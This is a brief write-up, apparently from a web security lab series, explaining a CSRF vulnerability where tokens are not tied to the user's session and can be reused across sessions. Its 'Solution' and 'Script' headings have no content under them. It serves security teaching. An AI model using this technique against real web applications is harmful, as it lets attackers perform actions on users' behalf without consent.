< Back





4. CSRF where token is not tied to user session

This web application is vulnerable to CSRF. An API endpoint and its parameters are well known, and
actions can be taken using a user's cookie without verifying the redirecting page. The browser
reuses the cookie for this site and submits a POST request on the user's behalf, forging the
request. CSRF tokens for this web application are not correlated with the user's session, so they
can be reused across multiple sessions. This means that an attacker can obtain a valid CSRF token
and use it to perform actions on behalf of the user.


Solution

Script